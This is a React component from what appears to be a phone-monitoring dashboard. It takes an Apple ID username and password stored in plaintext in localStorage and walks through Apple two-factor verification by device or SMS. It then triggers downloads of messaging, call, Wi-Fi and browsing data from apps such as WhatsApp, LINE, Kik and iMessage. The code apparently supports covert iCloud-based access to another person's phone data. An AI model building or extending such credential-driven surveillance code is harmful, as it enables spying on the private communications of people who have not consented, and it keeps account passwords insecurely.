import React, { useState } from 'react'
import { Button, Modal, message, Tabs, Steps, Space, Select, Spin, Alert } from 'antd'
import { LoadingOutlined, SmileOutlined, SolutionOutlined, UserOutlined } from '@ant-design/icons'
import Card from '@mui/material/Card'
import CardContent from '@mui/material/CardContent'
import BindIllustrate from '/src/@core/components/bind-illustrate'
import currentStyle from './index.module.scss'

import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  checkDownloadTime,
  sendDownloadTime,
  iosLoginVerification
} from 'src/@api/login'

import dynamic from 'next/dynamic'

import { useDispatch, useSelector } from 'react-redux'
import { fetchResetTime } from 'src/store/apps/Common'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('@axetroy/react-codebox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

import Image from 'next/image'

import Icon from 'src/@core/components/icon'

const AdvancedShow = () => {
  const [messageApi, contextHolder] = message.useMessage()

  const dispatch = useDispatch()

  const [isModalOpen, setIsModalOpen] = useState(true)

  let user = JSON.parse(localStorage.getItem('DeviceUser'))

  const handleCancel = () => {
    setIsModalOpen(false)
  }
  const [loginLoading, setLoginLoading] = useState(false)
  const [current, setCurrent] = useState(0)

  const sendCode = async () => {
    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })
      data = res?.data
    } catch (e) {
      console.error('[advanced-show sendCode] iosLoginVerification failed', e)
      setLoginLoading(false)
      message.info(e?.data?.em || 'Network error, please try again')

      return
    }

    setLoginLoading(false)

    // 业务错误码在 data.ec（如 10005 Apple ID locked）；顶层 code / HTTP 状态码为 0 不代表成功
    if (!data || typeof data !== 'object') {
      message.info('Network error, please try again')

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      handlePasswordError(data.ec)

      message.info(data.em)
      setLoginLoading(false)
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      setLoginLoading(false)
      message.info(data.em)
      setCurrent(1)
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(`iCloud doesn't have a phone number. Please verify using the device verification code!`)
        } else {
          setSmsErrorText(`Entered the incorrect verification codes. Please wait 30 minutes before trying again.`)
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      await handleEc10005({ username: user.username, password: user.password })
    } else if (isIcloudOk(data)) {
      setLoginLoading(false)

      message.info(data.em)

      // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
      const updateRes = await updateDeviceCredentials({
        username: user.username,
        password: user.password,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        message.info(updateRes?.msg || data.em)

        return
      }

      window.localStorage.setItem('Advanced', 1)

      let downloadRes = await downloadWeb({
        mode: 2,
        username: user.username,
        password: user.password
      })
      message.info(downloadRes.data.ed)
      await sendDownloadTime({ username: user.username, type: 'advanced_download' })
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)
    }
  }

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [smsId, setSmsId] = useState('')
  const [activeKey, setActiveKey] = useState('1')
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案

  const onChange = async key => {
    if (key == 2) {
      let mode = 2

      let sms = await bySms({
        mode: mode,
        username: user.username,
        password: user.password
      })

      let result = await authInfo({
        mode: mode,
        username: user.username,
        password: user.password
      })

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)

      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  const handleSelectChange = value => {
    setSmsId(value)
  }

  const codeDevice = async e => {
    let mode = 2

    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
        const updateRes = await updateDeviceCredentials({
          username: user.username,
          password: user.password,
          verify: 1
        })

        if (!isUpdateCredentialsOk(updateRes)) {
          message.info(updateRes?.msg || 'Update failed, please try again')

          return
        }

        window.localStorage.setItem('Advanced', 1)

        const verify = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          message.info('Network error, please try again')

          return
        }

        if (isIcloudOk(verify.data)) {
          let downloadRes = await downloadWeb({ mode: 2, username: user.username, password: user.password })
          messageApi.open({
            content: (
              <div style={{ maxWidth: '500px' }}>
                <p>{downloadRes.data.ed}</p>
              </div>
            ),
            duration: 8,
            style: {
              fontSize: '26px'
            }
          })
          setIsModalOpen(false)
          await sendDownloadTime({ username: user.username, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)
          setIsModalOpen(false)
        } else {
          handlePasswordError(verify.data.ec)
          message.info(verify.data.em)
        }

        await sendDownloadTime({ username: user.username, type: 'advanced_download' })
        setTimeout(() => {
          dispatch(fetchResetTime())
        }, 800)
      } catch (err) {
        console.error('[advanced-show codeDevice] failed', err)
        message.info(err?.data?.em || 'Network error, please try again')
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const result = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        phoneID: smsId,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = result?.data?.ec
      if (!isIcloudSendOk(ec)) {
        handlePasswordError(ec)
        message.info(result?.data?.em || 'Failed to send the verification code, please try again')


return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(`SMS has been sent, please receive`)
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      message.info(e?.data?.em || 'Failed to send the verification code, please try again')
    }
  }

  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        const result = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          phoneID: smsId,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          message.info('Network error, please try again')

          return
        }

        if (isIcloudOk(result.data)) {
          let downloadRes = await downloadWeb({
            mode: 2,
            username: user.username,
            password: user.password
          })

          messageApi.open({
            content: (
              <div style={{ maxWidth: '500px' }}>
                <p>{downloadRes.data.ed}</p>
              </div>
            ),
            duration: 8,
            style: {
              fontSize: '26px'
            }
          })
        } else {
          handlePasswordError(result.data.ec)
          message.info(result.data.em)
        }

        setIsModalOpen(false)

        await sendDownloadTime({ username: user.username, type: 'advanced_download' })
        setTimeout(() => {
          dispatch(fetchResetTime())
        }, 800)

        window.localStorage.setItem('Advanced', 1)
        setIsModalOpen(false)
      } catch (err) {
        console.error('[advanced-show codeSms] failed', err)
        message.info(err?.data?.em || 'Network error, please try again')
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)

  const getLoginCountry = () =>
    (JSON.parse(localStorage.getItem('userData'))?.data?.country_name || '').toLocaleLowerCase()

  const persistAdvancedUser = (username, password) => {
    user = { ...user, username, password }
    window.localStorage.setItem('DeviceUser', JSON.stringify({ ...user, mode: 2, country: getLoginCountry() }))
  }

  const applyAdvancedTwoStepFromReverify = (data, username, password) => {
    persistAdvancedUser(username, password)
    message.info(data.em)
    setCurrent(1)
    if (data?.ecurityType == 2) setActiveKey('2')
    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(data.trustedPhoneNumbers.map(item => ({ ...item, value: item.id, label: item.numberWithDialCode })))
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      setSmsErrorText(data?.ecPhoneList === 0
        ? "iCloud doesn't have a phone number. Please verify using the device verification code!"
        : 'Entered the incorrect verification codes. Please wait 30 minutes before trying again.')
    }
    setSmsPhoneListLoading(false)
  }

  const finishAdvancedDirectFromReverify = async (data, username, password) => {
    persistAdvancedUser(username, password)
    message.info(data.em)
    const updateRes = await updateDeviceCredentials({ username, password, verify: 1 })
    if (!isUpdateCredentialsOk(updateRes)) {
      message.info(updateRes?.msg || data.em)


return
    }
    window.localStorage.setItem('Advanced', 1)
    const downloadRes = await downloadWeb({ mode: 2, username, password })
    message.info(downloadRes.data.ed)
    await sendDownloadTime({ username, type: 'advanced_download' })
    setTimeout(() => dispatch(fetchResetTime()), 800)
    setIsModalOpen(false)
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 2,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => applyAdvancedTwoStepFromReverify(data, username, password),
    onDirectSuccess: async ({ data, username, password }) => finishAdvancedDirectFromReverify(data, username, password)
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  return (
    <>
      <Modal
        className='equipment'
        title=''
        closable={false}
        open={isModalOpen}
        onCancel={handleCancel}
        footer={[]}
        width={700}
      >
        <div
          style={{
            background: '#E7E7E7',
            display: 'flex',
            alignItems: 'center',
            justifyContent: 'space-between',
            padding: '0 10px',
            borderTopRightRadius: '8px',
            borderTopLeftRadius: '8px'
          }}
        >
          <h2 style={{ color: '#000000', fontSize: '22px' }}>Advanced Data Validation</h2>
          <Icon
            icon='ic:round-cancel'
            color='#494949'
            style={{ fontSize: '18px', cursor: 'pointer' }}
            onClick={handleCancel}
          />
        </div>

        {current == 0 ? (
          <div>
            <div
              style={{
                padding: '20px',
                display: 'flex',
                flexDirection: 'column',
                justifyContent: 'center',
                alignItems: 'center'
              }}
            >
              <Image
                src='/images/dashboards/20230725-104340.png'
                alt='img'
                width='38'
                height='50'
                style={{ marginRight: '6px' }}
              />
              <p style={{ fontSize: '20px', marginTop: '10px' }}>Basic data downloading...</p>
            </div>

            <Card style={{ width: '100%', marginTop: '14px', background: '#fff' }}>
              <div style={{ display: 'flex', justifyContent: 'center', padding: '10px', marginTop: '20px' }}>
                <Image
                  src='/images/dashboard/new-ios/whatsapp.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/line.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/kik.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/imessagers.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/wifi.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />

                <Image
                  src='/images/dashboard/new-ios/installed-app.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/calls.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/bookmark.svg'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
                <Image
                  src='/images/dashboard/new-ios/browsing.png'
                  alt='img'
                  width='28'
                  height='28'
                  style={{ marginRight: '6px' }}
                />
              </div>

              <h1
                className={currentStyle.h1}
                style={{ padding: '16px', textAlign: 'center', fontSize: '20px', marginTop: '10px' }}
              >
                Access to advanced data requires re-verification, now is the best time to do so.
              </h1>

              <div
                style={{
                  display: 'flex',
                  padding: '10px',
                  justifyContent: 'center',
                  marginTop: '20px',
                  marginBottom: '40px'
                }}
              >
                <Button
                  className={currentStyle.connect}
                  style={{
                    background: '#1578FF',
                    color: '#fff',
                    padding: '16px',
                    lineHeight: '0px',
                    width: '320px',
                    height: '40px',
                    fontSize: '18px',
                    fontWeight: '600'
                  }}
                  onClick={() => sendCode()}
                  loading={loginLoading}
                >
                  Send Code Now
                </Button>
              </div>
            </Card>
          </div>
        ) : (
          <div className='steps-content' style={{ padding: '10px', background: '#fff' }}>
            <h1 style={{ textAlign: 'center', marginTop: '20px', fontSize: '20px' }}>Choose a verification method</h1>
            <Tabs
              style={{ marginTop: '10px' }}
              defaultActiveKey='1'
              onChange={(key) => {
                if (key === '2' && smsPhoneListDisabled) {
                  message.info(smsErrorText)

                  return
                }
                setActiveKey(key === '2' ? key : '1')
              }}
              activeKey={activeKey}
              items={[
                {
                  label: `device`,
                  key: '1',
                  children: (
                    <>
                      <Spin spinning={loginLoading}>
                        <CodeBox
                          length={6}
                          validator={(input, index) => {
                            return /\d/.test(input)
                          }}
                          onChange={e => codeDevice(e)}
                        />
                      </Spin>
                      <p style={{ marginTop: '10px' }}>
                        A message has been sent to your device with a verification code. Enter verification code to
                        continue.
                      </p>
                    </>
                  )
                },
                {
                  label: `SMS`,
                  key: '2',
                  children: (
                    <>
                      <div style={{ display: 'flex', justifyContent: 'center', padding: '10px' }}>
                        <Select
                          defaultValue={defaultSmsPhone}
                          style={{
                            width: 170
                          }}
                          loading={smsPhoneListLoading}
                          disabled={smsPhoneListDisabled}
                          onChange={handleSelectChange}
                          options={smsPhoneList}
                        />
                        <button
                          disabled={btnDisable}
                          style={{
                            background: btnDisable ? '#07273D' : '#1677ff',
                            padding: '0 10px',
                            marginLeft: '8px',
                            color: '#fff',
                            borderRadius: '10px'
                          }}
                          onClick={sendSms}
                        >
                          {btnDisable ? sendTime : 'send'}
                        </button>
                      </div>

                      <div style={{ textAlign: 'center' }}>{sendContentTips != '' ? sendContentTips : null}</div>
                      <Spin spinning={loginLoading}>
                        <CodeBox
                          length={6}
                          validator={(input, index) => {
                            return /\d/.test(input)
                          }}
                          onChange={e => codeSms(e)}
                        />
                      </Spin>
                      <p style={{ marginTop: '10px' }}>
                        A message containing a verification code has been sent to your sms. Enter verification code to
                        continue.
                      </p>
                    </>
                  )
                }
              ]}
            />
          </div>
        )}
      </Modal>
      {contextHolder}
      {lockedFlowModals}
    </>
  )
}

export default AdvancedShow
